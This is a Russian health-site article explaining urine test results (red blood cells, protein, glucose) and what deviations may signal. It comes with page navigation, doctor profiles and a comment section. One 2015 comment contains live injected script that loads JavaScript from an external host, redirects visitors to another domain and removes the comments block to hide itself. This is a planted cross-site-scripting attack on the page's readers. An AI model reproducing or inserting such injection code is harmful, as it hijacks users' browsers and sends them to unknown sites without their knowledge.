Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  О чем говорят анализы моч...  >>  О чем говорят анализы мочи
 
Обратная связь
 

О чем говорят анализы мочи

Размер шрифта
06 апреля 2012 10:00
  • google_analytics: false
  • Нравится

В старых учебниках писали, что при употреблении спаржи моча приобретает аромат фиалок. О чем на самом деле может сказать анализ мочи, и какие ее признаки говорят о неблагополучии в организме?

В норме моча человека прозрачная, светло-соломенного (соломенно-желтого) цвета, т.е. практически бесцветная, с белой пеной, при этом она не должна иметь вкуса и запаха.

Признаки патологии организма

  • Эритроциты. Это очень серьезный диагностический критерий. В норме эритроциты не должны присутствовать в моче, но в анализе мочи может быть 0-3 в поле зрения.

Если в моче есть эритроциты, то ее цвет может варьироваться от розового до темно-красного.

Эритроциты в моче говорят о склонности к мочекаменной болезни, когда в почках появляются песок или камни, также этот признак может говорить о раке почек, мочевого пузыря или раке предстательной железы.

  • Белок. Его в моче быть не должно, но в нормальном анализе мочи может быть написано: «следы белка», потому что максимально допустимый показатель до 0,033 г/л.

Белок в моче может появиться при очень серьезных проблемах. Белки это крупномолекулярные соединения, поэтому они не способны пройти сквозь клубочковый фильтр в почках. В норме белки не выводятся из организма, потому что очень нужны.

Выявление до 1 г белка в моче в сутки говорит о хронических воспалительных заболеваниях. Если белка в моче становится больше 1 г, то это говорит о проблемах в собственной фильтрующей системе почек, например о гломерулонефрите, очень серьезном заболевании почек, когда они сморщиваются.

  • Глюкоза (сахар). Этот показатель важен для диагностики и контроля сахарного диабета. Если сахар появился в моче, то значит в крови его 9-10 ммоль/л (при норме сахара в крови 5,5 ммоль/л). А это значит, что сахарный диабет протекает бесконтрольно и скорее всего без должного лечения.

Что делать

Показатели анализа мочи не у каждого человека в норме. При обнаружении отклонения от нормы важно сразу же обратиться к врачу.

Сюжеты по теме:
О чем говорят анализы мочи

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Расстройства мочеиспускания и возраст: есть ли связь?   Что случится, если вы сядете на мочу   Три теста, если муж на вас кричит   Оказывается, мочой нельзя мыться! Как же быть?  

Слайдшоу

1
Цистит или гиперактивный мочевой пузырь
Тренировка мочевого пузыря и мышц тазового дна
Мочегонные продукты и напитки

Тесты

Что скрывает ваша моча?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.